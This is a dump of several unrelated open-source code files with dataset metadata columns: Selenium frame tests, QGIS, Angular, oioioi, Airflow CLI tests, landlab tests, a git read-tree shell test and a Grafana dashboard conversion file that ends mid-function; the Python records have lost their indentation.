def testShouldAllowTheUserToSwitchToAnIFrameAndRemainFocusedOnIt(driver, pages):
pages.load("iframes.html")
driver.switch_to.frame(0)
driver.find_element(By.ID, "submitButton").click()
assert getTextOfGreetingElement(driver) == "Success!"
def getTextOfGreetingElement(driver):
return WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.ID, "greeting"))).text
@pytest.mark.xfail_chrome(reason='https://bugs.chromium.org/p/chromedriver/issues/detail?id=2198')
def testShouldBeAbleToClickInAFrame(driver, pages):
pages.load("frameset.html")
driver.switch_to.frame("third")
# This should replace frame "third" ...
driver.find_element(By.ID, "submitButton").click()
# driver should still be focused on frame "third" ...
assert getTextOfGreetingElement(driver) == "Success!"
# Make sure it was really frame "third" which was replaced ...
driver.switch_to.default_content()
driver.switch_to.frame("third")
assert getTextOfGreetingElement(driver) == "Success!"
def testShouldBeAbleToClickInAFrameThatRewritesTopWindowLocation(driver, pages):
pages.load("click_tests/issue5237.html")
driver.switch_to.frame(driver.find_element_by_id("search"))
driver.find_element(By.ID, "submit").click()
driver.switch_to.default_content()
WebDriverWait(driver, 3).until(EC.title_is("Target page for issue 5237"))
@pytest.mark.xfail_chrome(reason='https://bugs.chromium.org/p/chromedriver/issues/detail?id=2198')
def testShouldBeAbleToClickInASubFrame(driver, pages):
pages.load("frameset.html")
driver.switch_to.frame(driver.find_element_by_id("sixth"))
driver.switch_to.frame(driver.find_element_by_id("iframe1"))
# This should replace frame "iframe1" inside frame "sixth" ...
driver.find_element(By.ID, "submitButton").click()
# driver should still be focused on frame "iframe1" inside frame "sixth" ...
assert getTextOfGreetingElement(driver), "Success!"
# Make sure it was really frame "iframe1" inside frame "sixth" which was replaced ...
driver.switch_to.default_content()
driver.switch_to.frame(driver.find_element_by_id("sixth"))
driver.switch_to.frame(driver.find_element_by_id("iframe1"))
assert driver.find_element(By.ID, "greeting").text == "Success!"
def testShouldBeAbleToFindElementsInIframesByXPath(driver, pages):
pages.load("iframes.html")
driver.switch_to.frame(driver.find_element_by_id("iframe1"))
element = driver.find_element(By.XPATH, "//*[@id = 'changeme']")
assert element is not None
def testGetCurrentUrlReturnsTopLevelBrowsingContextUrl(driver, pages):
pages.load("frameset.html")
assert "frameset.html" in driver.current_url
driver.switch_to.frame(driver.find_element_by_name("second"))
assert "frameset.html" in driver.current_url
def testGetCurrentUrlReturnsTopLevelBrowsingContextUrlForIframes(driver, pages):
pages.load("iframes.html")
assert "iframes.html" in driver.current_url
driver.switch_to.frame(driver.find_element_by_id("iframe1"))
assert "iframes.html" in driver.current_url
def testShouldBeAbleToSwitchToTheTopIfTheFrameIsDeletedFromUnderUs(driver, pages):
pages.load("frame_switching_tests/deletingFrame.html")
driver.switch_to.frame(driver.find_element_by_id("iframe1"))
killIframe = driver.find_element(By.ID, "killIframe")
killIframe.click()
driver.switch_to.default_content()
WebDriverWait(driver, 3).until_not(
EC.presence_of_element_located((By.ID, "iframe1")))
addIFrame = driver.find_element(By.ID, "addBackFrame")
addIFrame.click()
WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.ID, "iframe1")))
driver.switch_to.frame(driver.find_element_by_id("iframe1"))
WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.ID, "success")))
def testShouldBeAbleToSwitchToTheTopIfTheFrameIsDeletedFromUnderUsWithFrameIndex(driver, pages):
pages.load("frame_switching_tests/deletingFrame.html")
iframe = 0
WebDriverWait(driver, 3).until(EC.frame_to_be_available_and_switch_to_it(iframe))
# we should be in the frame now
killIframe = driver.find_element(By.ID, "killIframe")
killIframe.click()
driver.switch_to.default_content()
addIFrame = driver.find_element(By.ID, "addBackFrame")
addIFrame.click()
WebDriverWait(driver, 3).until(EC.frame_to_be_available_and_switch_to_it(iframe))
WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.ID, "success")))
def testShouldBeAbleToSwitchToTheTopIfTheFrameIsDeletedFromUnderUsWithWebelement(driver, pages):
pages.load("frame_switching_tests/deletingFrame.html")
iframe = driver.find_element(By.ID, "iframe1")
WebDriverWait(driver, 3).until(EC.frame_to_be_available_and_switch_to_it(iframe))
# we should be in the frame now
killIframe = driver.find_element(By.ID, "killIframe")
killIframe.click()
driver.switch_to.default_content()
addIFrame = driver.find_element(By.ID, "addBackFrame")
addIFrame.click()
iframe = driver.find_element(By.ID, "iframe1")
WebDriverWait(driver, 3).until(EC.frame_to_be_available_and_switch_to_it(iframe))
WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.ID, "success")))
@pytest.mark.xfail_chrome(raises=NoSuchElementException)
@pytest.mark.xfail_marionette(raises=WebDriverException,
reason='https://github.com/mozilla/geckodriver/issues/614')
@pytest.mark.xfail_webkitgtk(raises=NoSuchElementException)
def testShouldNotBeAbleToDoAnythingTheFrameIsDeletedFromUnderUs(driver, pages):
pages.load("frame_switching_tests/deletingFrame.html")
driver.switch_to.frame(driver.find_element_by_id("iframe1"))
killIframe = driver.find_element(By.ID, "killIframe")
killIframe.click()
with pytest.raises(NoSuchFrameException):
driver.find_element(By.ID, "killIframe").click()
def testShouldReturnWindowTitleInAFrameset(driver, pages):
pages.load("frameset.html")
driver.switch_to.frame(driver.find_element_by_name("third"))
assert "Unique title" == driver.title
def testJavaScriptShouldExecuteInTheContextOfTheCurrentFrame(driver, pages):
pages.load("frameset.html")
assert driver.execute_script("return window == window.top")
driver.switch_to.frame(driver.find_element(By.NAME, "third"))
assert driver.execute_script("return window != window.top")
@pytest.mark.xfail_chrome(reason='https://bugs.chromium.org/p/chromedriver/issues/detail?id=2198')
def testShouldNotSwitchMagicallyToTheTopWindow(driver, pages):
pages.load("frame_switching_tests/bug4876.html")
driver.switch_to.frame(0)
WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.ID, "inputText")))
for i in range(20):
try:
input = WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.ID, "inputText")))
submit = WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.ID, "submitButton")))
input.clear()
import random
input.send_keys("rand%s" % int(random.random()))
submit.click()
finally:
url = driver.execute_script("return window.location.href")
# IE6 and Chrome add "?"-symbol to the end of the URL
if (url.endswith("?")):
url = url[:len(url) - 1]
assert pages.url("frame_switching_tests/bug4876_iframe.html") == url
def testGetShouldSwitchToDefaultContext(driver, pages):
pages.load("iframes.html")
driver.find_element(By.ID, "iframe1")
driver.switch_to.frame(driver.find_element(By.ID, "iframe1"))
driver.find_element(By.ID, "cheese") # Found on formPage.html but not on iframes.html.
pages.load("iframes.html") # This must effectively switch_to.default_content(), too.
driver.find_element(By.ID, "iframe1") | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
"""
***************************************************************************
AddScriptFromTemplateAction.py
---------------------
Date : August 2012
Copyright : (C) 2018 by Matteo Ghetta
Email : matteo dot ghetta at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Matteo Ghetta'
__date__ = 'March 2018'
__copyright__ = '(C) 2018, Matteo Ghetta'
import os
import codecs
from qgis.PyQt.QtCore import QCoreApplication
from qgis.core import QgsApplication
from processing.gui.ToolboxAction import ToolboxAction
from processing.script.ScriptEditorDialog import ScriptEditorDialog
class AddScriptFromTemplateAction(ToolboxAction):
def __init__(self):
self.name = QCoreApplication.translate("AddScriptFromTemplate", "Create New Script from Template…")
self.group = self.tr("Tools")
def execute(self):
dlg = ScriptEditorDialog(None)
pluginPath = os.path.split(os.path.dirname(__file__))[0]
templatePath = os.path.join(
pluginPath, 'script', 'ScriptTemplate.py')
with codecs.open(templatePath, 'r', encoding='utf-8') as f:
templateTxt = f.read()
dlg.editor.setText(templateTxt)
dlg.show() | unknown | codeparrot/codeparrot-clean | ||
import {Component} from '@angular/core';
import {HEROES} from './mock-heroes';
import {HeroListEnterLeave} from './hero-list-enter-leave';
@Component({
selector: 'app-hero-list-enter-leave-page',
template: `
<section>
<h2>Enter/Leave</h2>
<app-hero-list-enter-leave
[heroes]="heroes"
(remove)="onRemove($event)"
></app-hero-list-enter-leave>
</section>
`,
imports: [HeroListEnterLeave],
})
export class HeroListEnterLeavePage {
heroes = HEROES.slice();
onRemove(id: number) {
this.heroes = this.heroes.filter((hero) => hero.id !== id);
}
} | typescript | github | https://github.com/angular/angular | adev/src/content/examples/animations/src/app/hero-list-enter-leave-page.ts |
from django.core.management.base import BaseCommand
from django.db.models import F
from django.utils.translation import ugettext as _
from oioioi.problems.models import Problem
from oioioi.programs.models import ModelProgramSubmission
class Command(BaseCommand):
help = str(
_(
"Prints problems without 100-scored model solution. If "
"username is provided it shows only problems added by that "
"user."
)
)
def add_arguments(self, parser):
parser.add_argument(
'--user',
metavar='USERNAME',
help='Optional username for filtering problems.',
)
def handle(self, *args, **options):
username = options.get('user')
problems = self.get_problems_without_correct_modelsolution(username)
self.stdout.write('Problems: ' + str(len(problems)) + '\n')
for problem in problems:
message = u'- {name} / {short_name} ; id = {id}\n'.format(
name=problem.name, short_name=problem.short_name, id=str(problem.pk)
)
self.stdout.write(message)
def get_problems_without_correct_modelsolution(self, username=None):
if username is not None:
problems = Problem.objects.filter(author__username=username)
else:
problems = Problem.objects.all()
bad_problems = []
for problem in problems:
correct_model_submissions = ModelProgramSubmission.objects.filter(
score=F('submissionreport__scorereport__max_score'),
model_solution__problem=problem,
).order_by('id')
if not correct_model_submissions:
bad_problems.append(problem)
return bad_problems | unknown | codeparrot/codeparrot-clean | ||
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import annotations
import sys
from unittest import mock
import pytest
from rich.console import Console
from airflow.cli.commands import api_server_command
from airflow.exceptions import AirflowConfigException
from unit.cli.commands._common_cli_classes import _CommonCLIUvicornTestClass
console = Console(width=400, color_system="standard")
@pytest.mark.db_test
class TestCliApiServer(_CommonCLIUvicornTestClass):
main_process_regexp = r"airflow api-server"
@pytest.mark.parametrize(
"args",
[
pytest.param(
["api-server", "--port", "9092", "--host", "somehost", "--dev"],
id="dev mode with port and host",
),
pytest.param(
["api-server", "--port", "9092", "--host", "somehost", "--dev", "--proxy-headers"],
id="dev mode with port, host and proxy headers",
),
pytest.param(
[
"api-server",
"--port",
"9092",
"--host",
"somehost",
"--dev",
"--log-config",
"my_log_config.yaml",
],
id="dev mode with port, host and log config",
),
],
)
def test_dev_arg(self, args):
with (
mock.patch("fastapi_cli.cli._run") as mock_run,
):
args = self.parser.parse_args(args)
api_server_command.api_server(args)
mock_run.assert_called_with(
entrypoint="airflow.api_fastapi.main:app",
port=args.port,
host=args.host,
reload=True,
proxy_headers=args.proxy_headers,
command="dev",
)
@pytest.mark.parametrize(
"args",
[
(["api-server"]),
(["api-server", "--apps", "all"]),
(["api-server", "--apps", "core,execution"]),
(["api-server", "--apps", "core"]),
(["api-server", "--apps", "execution"]),
],
ids=[
"default_apps",
"all_apps_explicit",
"multiple_apps_explicit",
"single_app_core",
"single_app_execution",
],
)
@pytest.mark.parametrize("dev_mode", [True, False])
@pytest.mark.parametrize(
"original_env",
[None, "some_value"],
)
def test_api_apps_env(self, args, dev_mode, original_env):
"""
Test that AIRFLOW_API_APPS is set and unset in the environment when
calling the airflow api-server command
"""
expected_setitem_calls = []
if dev_mode:
args.append("--dev")
with (
mock.patch("os.environ", autospec=True) as mock_environ,
mock.patch("uvicorn.run"),
mock.patch("fastapi_cli.cli._run"),
):
# Mock the environment variable with initial value or None
mock_environ.get.return_value = original_env
# Parse the command line arguments and call the api_server command
parsed_args = self.parser.parse_args(args)
api_server_command.api_server(parsed_args)
# Verify the AIRFLOW_API_APPS was set correctly
if "--apps" in args:
expected_setitem_calls.append(mock.call("AIRFLOW_API_APPS", parsed_args.apps))
# Verify AIRFLOW_API_APPS was cleaned up
if original_env is not None:
expected_setitem_calls.append(mock.call("AIRFLOW_API_APPS", original_env))
else:
mock_environ.pop.assert_called_with("AIRFLOW_API_APPS", None)
# Verify that the environment variable was set and cleaned up correctly
mock_environ.__setitem__.assert_has_calls(expected_setitem_calls)
@pytest.mark.parametrize(
("cli_args", "expected_additional_kwargs"),
[
pytest.param(
[
"api-server",
"--pid",
"/tmp/x.pid",
"--ssl-cert",
"ssl_cert_path_placeholder",
"--ssl-key",
"ssl_key_path_placeholder",
"--apps",
"core",
],
{
"ssl_keyfile": "ssl_key_path_placeholder",
"ssl_certfile": "ssl_cert_path_placeholder",
},
id="api-server with SSL cert and key",
),
pytest.param(
[
"api-server",
"--log-config",
"my_log_config.yaml",
],
{
"ssl_keyfile": None,
"ssl_certfile": None,
"log_config": "my_log_config.yaml",
},
id="api-server with log config",
),
],
)
def test_args_to_uvicorn(self, ssl_cert_and_key, cli_args, expected_additional_kwargs):
cert_path, key_path = ssl_cert_and_key
if "ssl_cert_path_placeholder" in cli_args:
cli_args[cli_args.index("ssl_cert_path_placeholder")] = str(cert_path)
expected_additional_kwargs["ssl_certfile"] = str(cert_path)
if "ssl_key_path_placeholder" in cli_args:
cli_args[cli_args.index("ssl_key_path_placeholder")] = str(key_path)
expected_additional_kwargs["ssl_keyfile"] = str(key_path)
with (
mock.patch("uvicorn.run") as mock_run,
):
args = self.parser.parse_args(cli_args)
api_server_command.api_server(args)
mock_run.assert_called_with(
"airflow.api_fastapi.main:app",
**{
"host": args.host,
"port": args.port,
"workers": args.workers,
"timeout_keep_alive": args.worker_timeout,
"timeout_graceful_shutdown": args.worker_timeout,
"timeout_worker_healthcheck": args.worker_timeout,
"access_log": True,
"log_level": "info",
"proxy_headers": args.proxy_headers,
**expected_additional_kwargs,
},
)
@pytest.mark.parametrize(
"demonize",
[True, False],
)
@mock.patch("airflow.cli.commands.daemon_utils.TimeoutPIDLockFile")
@mock.patch("airflow.cli.commands.daemon_utils.setup_locations")
@mock.patch("airflow.cli.commands.daemon_utils.daemon")
@mock.patch("airflow.cli.commands.daemon_utils.check_if_pidfile_process_is_running")
@mock.patch("airflow.cli.commands.api_server_command.uvicorn")
def test_run_command_daemon(
self, mock_uvicorn, _, mock_daemon, mock_setup_locations, mock_pid_file, demonize
):
mock_setup_locations.return_value = (
mock.MagicMock(name="pidfile"),
mock.MagicMock(name="stdout"),
mock.MagicMock(name="stderr"),
mock.MagicMock(name="INVALID"),
)
args = self.parser.parse_args(
[
"api-server",
"--host",
"my-hostname",
"--port",
"9090",
"--workers",
"2",
"--worker-timeout",
"60",
]
+ (["--daemon"] if demonize else [])
)
mock_open = mock.mock_open()
with mock.patch("airflow.cli.commands.daemon_utils.open", mock_open):
api_server_command.api_server(args)
mock_uvicorn.run.assert_called_once_with(
"airflow.api_fastapi.main:app",
host="my-hostname",
port=9090,
workers=2,
timeout_keep_alive=60,
timeout_graceful_shutdown=60,
timeout_worker_healthcheck=60,
ssl_keyfile=None,
ssl_certfile=None,
access_log=True,
log_level="info",
proxy_headers=False,
)
if demonize:
assert mock_daemon.mock_calls[:3] == [
mock.call.DaemonContext(
pidfile=mock_pid_file.return_value,
files_preserve=None,
stdout=mock_open.return_value,
stderr=mock_open.return_value,
umask=0o077,
),
mock.call.DaemonContext().__enter__(),
mock.call.DaemonContext().__exit__(None, None, None),
]
assert mock_setup_locations.mock_calls == [
mock.call(
process="api_server",
pid=None,
stdout=None,
stderr=None,
log=None,
)
]
mock_pid_file.assert_has_calls([mock.call(mock_setup_locations.return_value[0], -1)])
if sys.version_info >= (3, 13):
# extra close is called in Python 3.13+ to close the file descriptors
assert mock_open.mock_calls == [
mock.call(mock_setup_locations.return_value[1], "a"),
mock.call().__enter__(),
mock.call(mock_setup_locations.return_value[2], "a"),
mock.call().__enter__(),
mock.call().truncate(0),
mock.call().truncate(0),
mock.call().__exit__(None, None, None),
mock.call().close(),
mock.call().__exit__(None, None, None),
mock.call().close(),
]
else:
assert mock_open.mock_calls == [
mock.call(mock_setup_locations.return_value[1], "a"),
mock.call().__enter__(),
mock.call(mock_setup_locations.return_value[2], "a"),
mock.call().__enter__(),
mock.call().truncate(0),
mock.call().truncate(0),
mock.call().__exit__(None, None, None),
mock.call().__exit__(None, None, None),
]
else:
assert mock_daemon.mock_calls == []
mock_setup_locations.mock_calls == []
mock_pid_file.assert_not_called()
mock_open.assert_not_called()
@pytest.mark.parametrize(
("ssl_arguments", "error_pattern"),
[
(["--ssl-cert", "_.crt", "--ssl-key", "_.key"], "does not exist _.crt"),
(["--ssl-cert", "_.crt"], "Need both.*certificate.*key"),
(["--ssl-key", "_.key"], "Need both.*key.*certificate"),
],
)
def test_get_ssl_cert_and_key_filepaths_with_incorrect_usage(self, ssl_arguments, error_pattern):
args = self.parser.parse_args(["api-server"] + ssl_arguments)
with pytest.raises(AirflowConfigException, match=error_pattern):
api_server_command._get_ssl_cert_and_key_filepaths(args)
def test_get_ssl_cert_and_key_filepaths_with_correct_usage(self, ssl_cert_and_key):
cert_path, key_path = ssl_cert_and_key
args = self.parser.parse_args(
["api-server"] + ["--ssl-cert", str(cert_path), "--ssl-key", str(key_path)]
)
assert api_server_command._get_ssl_cert_and_key_filepaths(args) == (str(cert_path), str(key_path))
@pytest.fixture
def ssl_cert_and_key(self, tmp_path):
cert_path, key_path = tmp_path / "_.crt", tmp_path / "_.key"
cert_path.touch()
key_path.touch()
return cert_path, key_path | python | github | https://github.com/apache/airflow | airflow-core/tests/unit/cli/commands/test_api_server_command.py |
"""
Unit tests for \
landlab.components.soil_moisture.soil_moisture_dynamics
"""
import numpy as np
import pytest
from numpy.testing import assert_array_almost_equal
(_SHAPE, _SPACING, _ORIGIN) = ((20, 20), (10e0, 10e0), (0.0, 0.0))
_ARGS = (_SHAPE, _SPACING, _ORIGIN)
def test_name(sm):
assert sm.name == "Soil Moisture"
def test_input_var_names(sm):
assert sorted(sm.input_var_names) == [
"rainfall__daily_depth",
"soil_moisture__initial_saturation_fraction",
"surface__potential_evapotranspiration_rate",
"vegetation__cover_fraction",
"vegetation__live_leaf_area_index",
"vegetation__plant_functional_type",
]
def test_output_var_names(sm):
assert sorted(sm.output_var_names) == [
"soil_moisture__root_zone_leakage",
"soil_moisture__saturation_fraction",
"surface__evapotranspiration",
"surface__runoff",
"vegetation__water_stress",
]
def test_var_units(sm):
assert set(sm.input_var_names) | set(sm.output_var_names), set(
dict(sm.units).keys()
)
assert sm.var_units("vegetation__cover_fraction") == "None"
assert sm.var_units("vegetation__live_leaf_area_index") == "None"
assert sm.var_units("surface__potential_evapotranspiration_rate") == "mm"
assert sm.var_units("vegetation__plant_functional_type") == "None"
assert sm.var_units("vegetation__water_stress") == "None"
assert sm.var_units("soil_moisture__saturation_fraction") == "None"
assert sm.var_units("soil_moisture__initial_saturation_fraction") == "None"
assert sm.var_units("soil_moisture__root_zone_leakage") == "mm"
assert sm.var_units("surface__runoff") == "mm"
assert sm.var_units("surface__evapotranspiration") == "mm"
assert sm.var_units("rainfall__daily_depth") == "mm"
def test_grid_shape(sm):
assert sm.grid.number_of_node_rows == _SHAPE[0]
assert sm.grid.number_of_node_columns == _SHAPE[1]
def test_grid_x_extent(sm):
assert sm.grid.extent[1] == (_SHAPE[1] - 1) * _SPACING[1]
def test_grid_y_extent(sm):
assert sm.grid.extent[0] == (_SHAPE[0] - 1) * _SPACING[0]
def test_field_getters(sm):
for name in sm.grid["node"]:
field = sm.grid["node"][name]
assert isinstance(field, np.ndarray)
assert field.shape == (
sm.grid.number_of_node_rows * sm.grid.number_of_node_columns,
)
for name in sm.grid["cell"]:
field = sm.grid["cell"][name]
assert isinstance(field, np.ndarray)
assert field.shape == (
sm.grid.number_of_cell_rows * sm.grid.number_of_cell_columns,
)
with pytest.raises(KeyError):
sm.grid["not_a_var_name"]
def test_field_initialized_to_zero(sm):
for name in sm.grid["node"]:
field = sm.grid["node"][name]
assert_array_almost_equal(field, np.zeros(sm.grid.number_of_nodes))
for name in sm.grid["cell"]:
field = sm.grid["cell"][name]
assert_array_almost_equal(field, np.zeros(sm.grid.number_of_cells)) | unknown | codeparrot/codeparrot-clean | ||
#!/bin/sh
test_description='read-tree -m -u checks working tree files'
GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main
export GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME
. ./test-lib.sh
. "$TEST_DIRECTORY"/lib-read-tree.sh
# two-tree test
test_expect_success 'two-way setup' '
mkdir subdir &&
echo >file1 file one &&
echo >file2 file two &&
echo >subdir/file1 file one in subdirectory &&
echo >subdir/file2 file two in subdirectory &&
git update-index --add file1 file2 subdir/file1 subdir/file2 &&
git commit -m initial &&
git branch side &&
git tag -f branch-point &&
echo file2 is not tracked on the main branch anymore &&
rm -f file2 subdir/file2 &&
git update-index --remove file2 subdir/file2 &&
git commit -a -m "main removes file2 and subdir/file2"
'
test_expect_success 'two-way not clobbering' '
echo >file2 main creates untracked file2 &&
echo >subdir/file2 main creates untracked subdir/file2 &&
if err=$(read_tree_u_must_succeed -m -u main side 2>&1)
then
echo should have complained
false
else
echo "happy to see $err"
fi
'
echo file2 >.gitignore
test_expect_success 'two-way with incorrect --exclude-per-directory (1)' '
if err=$(read_tree_u_must_succeed -m --exclude-per-directory=.gitignore main side 2>&1)
then
echo should have complained
false
else
echo "happy to see $err"
fi
'
test_expect_success 'two-way with incorrect --exclude-per-directory (2)' '
if err=$(read_tree_u_must_succeed -m -u --exclude-per-directory=foo --exclude-per-directory=.gitignore main side 2>&1)
then
echo should have complained
false
else
echo "happy to see $err"
fi
'
test_expect_success 'two-way clobbering a ignored file' '
read_tree_u_must_succeed -m -u --exclude-per-directory=.gitignore main side
'
rm -f .gitignore
# three-tree test
test_expect_success 'three-way not complaining on an untracked path in both' '
rm -f file2 subdir/file2 &&
git checkout side &&
echo >file3 file three &&
echo >subdir/file3 file three &&
git update-index --add file3 subdir/file3 &&
git commit -a -m "side adds file3 and removes file2" &&
git checkout main &&
echo >file2 file two is untracked on the main side &&
echo >subdir/file2 file two is untracked on the main side &&
read_tree_u_must_succeed -m -u branch-point main side
'
test_expect_success 'three-way not clobbering a working tree file' '
git reset --hard &&
rm -f file2 subdir/file2 file3 subdir/file3 &&
git checkout main &&
echo >file3 file three created in main, untracked &&
echo >subdir/file3 file three created in main, untracked &&
if err=$(read_tree_u_must_succeed -m -u branch-point main side 2>&1)
then
echo should have complained
false
else
echo "happy to see $err"
fi
'
echo >.gitignore file3
test_expect_success 'three-way not complaining on an untracked file' '
git reset --hard &&
rm -f file2 subdir/file2 file3 subdir/file3 &&
git checkout main &&
echo >file3 file three created in main, untracked &&
echo >subdir/file3 file three created in main, untracked &&
read_tree_u_must_succeed -m -u --exclude-per-directory=.gitignore branch-point main side
'
test_expect_success '3-way not overwriting local changes (setup)' '
git reset --hard &&
git checkout -b side-a branch-point &&
echo >>file1 "new line to be kept in the merge result" &&
git commit -a -m "side-a changes file1" &&
git checkout -b side-b branch-point &&
echo >>file2 "new line to be kept in the merge result" &&
git commit -a -m "side-b changes file2" &&
git checkout side-a
'
test_expect_success '3-way not overwriting local changes (our side)' '
# At this point, file1 from side-a should be kept as side-b
# did not touch it.
git reset --hard &&
echo >>file1 "local changes" &&
read_tree_u_must_succeed -m -u branch-point side-a side-b &&
grep "new line to be kept" file1 &&
grep "local changes" file1
'
test_expect_success '3-way not overwriting local changes (their side)' '
# At this point, file2 from side-b should be taken as side-a
# did not touch it.
git reset --hard &&
echo >>file2 "local changes" &&
read_tree_u_must_fail -m -u branch-point side-a side-b &&
! grep "new line to be kept" file2 &&
grep "local changes" file2
'
test_expect_success 'funny symlink in work tree' '
git reset --hard &&
git checkout -b sym-b side-b &&
mkdir -p a &&
>a/b &&
git add a/b &&
git commit -m "side adds a/b" &&
rm -fr a &&
git checkout -b sym-a side-a &&
mkdir -p a &&
test_ln_s_add ../b a/b &&
git commit -m "we add a/b" &&
read_tree_u_must_succeed -m -u sym-a sym-a sym-b
'
test_expect_success SANITY 'funny symlink in work tree, un-unlink-able' '
test_when_finished "chmod u+w a 2>/dev/null; rm -fr a b" &&
rm -fr a b &&
git reset --hard &&
git checkout sym-a &&
chmod a-w a &&
test_must_fail git read-tree -m -u sym-a sym-a sym-b
'
test_expect_success 'D/F setup' '
git reset --hard &&
git checkout side-a &&
rm -f subdir/file2 &&
mkdir subdir/file2 &&
echo qfwfq >subdir/file2/another &&
git add subdir/file2/another &&
test_tick &&
git commit -m "side-a changes file2 to directory"
'
test_expect_success 'D/F' '
git checkout side-b &&
read_tree_u_must_succeed -m -u branch-point side-b side-a &&
git ls-files -u >actual &&
(
a=$(git rev-parse branch-point:subdir/file2) &&
b=$(git rev-parse side-a:subdir/file2/another) &&
echo "100644 $a 1 subdir/file2" &&
echo "100644 $a 2 subdir/file2" &&
echo "100644 $b 3 subdir/file2/another"
) >expect &&
test_cmp expect actual
'
test_expect_success 'D/F resolve' '
git reset --hard &&
git checkout side-b &&
git merge-resolve branch-point -- side-b side-a
'
test_expect_success 'D/F recursive' '
git reset --hard &&
git checkout side-b &&
git merge-recursive branch-point -- side-b side-a
'
test_done | unknown | github | https://github.com/git/git | t/t1004-read-tree-m-u-wf.sh |
package conversion
import (
"k8s.io/apimachinery/pkg/conversion"
"k8s.io/apimachinery/pkg/runtime"
dashv0 "github.com/grafana/grafana/apps/dashboard/pkg/apis/dashboard/v0alpha1"
dashv1 "github.com/grafana/grafana/apps/dashboard/pkg/apis/dashboard/v1beta1"
dashv2alpha1 "github.com/grafana/grafana/apps/dashboard/pkg/apis/dashboard/v2alpha1"
dashv2beta1 "github.com/grafana/grafana/apps/dashboard/pkg/apis/dashboard/v2beta1"
"github.com/grafana/grafana/apps/dashboard/pkg/migration/schemaversion"
)
func RegisterConversions(s *runtime.Scheme, dsIndexProvider schemaversion.DataSourceIndexProvider, leIndexProvider schemaversion.LibraryElementIndexProvider) error {
// v0 conversions
if err := s.AddConversionFunc((*dashv0.Dashboard)(nil), (*dashv1.Dashboard)(nil),
withConversionMetrics(dashv0.APIVERSION, dashv1.APIVERSION, func(a, b interface{}, scope conversion.Scope) error {
return Convert_V0_to_V1beta1(a.(*dashv0.Dashboard), b.(*dashv1.Dashboard), scope)
})); err != nil {
return err
}
if err := s.AddConversionFunc((*dashv0.Dashboard)(nil), (*dashv2alpha1.Dashboard)(nil),
withConversionMetrics(dashv0.APIVERSION, dashv2alpha1.APIVERSION, func(a, b interface{}, scope conversion.Scope) error {
return Convert_V0_to_V2alpha1(a.(*dashv0.Dashboard), b.(*dashv2alpha1.Dashboard), scope, dsIndexProvider, leIndexProvider)
})); err != nil {
return err
}
if err := s.AddConversionFunc((*dashv0.Dashboard)(nil), (*dashv2beta1.Dashboard)(nil),
withConversionMetrics(dashv0.APIVERSION, dashv2beta1.APIVERSION, func(a, b interface{}, scope conversion.Scope) error {
return Convert_V0_to_V2beta1(a.(*dashv0.Dashboard), b.(*dashv2beta1.Dashboard), scope, dsIndexProvider, leIndexProvider)
})); err != nil {
return err
}
// v1 conversions
if err := s.AddConversionFunc((*dashv1.Dashboard)(nil), (*dashv0.Dashboard)(nil),
withConversionMetrics(dashv1.APIVERSION, dashv0.APIVERSION, func(a, b interface{}, scope conversion.Scope) error {
return Convert_V1beta1_to_V0(a.(*dashv1.Dashboard), b.(*dashv0.Dashboard), scope)
})); err != nil {
return err
}
if err := s.AddConversionFunc((*dashv1.Dashboard)(nil), (*dashv2alpha1.Dashboard)(nil),
withConversionMetrics(dashv1.APIVERSION, dashv2alpha1.APIVERSION, func(a, b interface{}, scope conversion.Scope) error {
return Convert_V1beta1_to_V2alpha1(a.(*dashv1.Dashboard), b.(*dashv2alpha1.Dashboard), scope, dsIndexProvider, leIndexProvider)
})); err != nil {
return err
}
if err := s.AddConversionFunc((*dashv1.Dashboard)(nil), (*dashv2beta1.Dashboard)(nil),
withConversionMetrics(dashv1.APIVERSION, dashv2beta1.APIVERSION, func(a, b interface{}, scope conversion.Scope) error {
return Convert_V1beta1_to_V2beta1(a.(*dashv1.Dashboard), b.(*dashv2beta1.Dashboard), scope, dsIndexProvider, leIndexProvider)
})); err != nil {
return err
}
// v2alpha1 conversions
if err := s.AddConversionFunc((*dashv2alpha1.Dashboard)(nil), (*dashv0.Dashboard)(nil),
withConversionMetrics(dashv2alpha1.APIVERSION, dashv0.APIVERSION, func(a, b interface{}, scope conversion.Scope) error {
return Convert_V2alpha1_to_V0(a.(*dashv2alpha1.Dashboard), b.(*dashv0.Dashboard), scope)
})); err != nil {
return err
}
if err := s.AddConversionFunc((*dashv2alpha1.Dashboard)(nil), (*dashv1.Dashboard)(nil),
withConversionMetrics(dashv2alpha1.APIVERSION, dashv1.APIVERSION, func(a, b interface{}, scope conversion.Scope) error {
return Convert_V2alpha1_to_V1beta1(a.(*dashv2alpha1.Dashboard), b.(*dashv1.Dashboard), scope)
})); err != nil {
return err
}
if err := s.AddConversionFunc((*dashv2alpha1.Dashboard)(nil), (*dashv2beta1.Dashboard)(nil),
withConversionMetrics(dashv2alpha1.APIVERSION, dashv2beta1.APIVERSION, func(a, b interface{}, scope conversion.Scope) error {
return Convert_V2alpha1_to_V2beta1(a.(*dashv2alpha1.Dashboard), b.(*dashv2beta1.Dashboard), scope)
})); err != nil {
return err
}
// v2beta1 conversions
if err := s.AddConversionFunc((*dashv2beta1.Dashboard)(nil), (*dashv0.Dashboard)(nil),
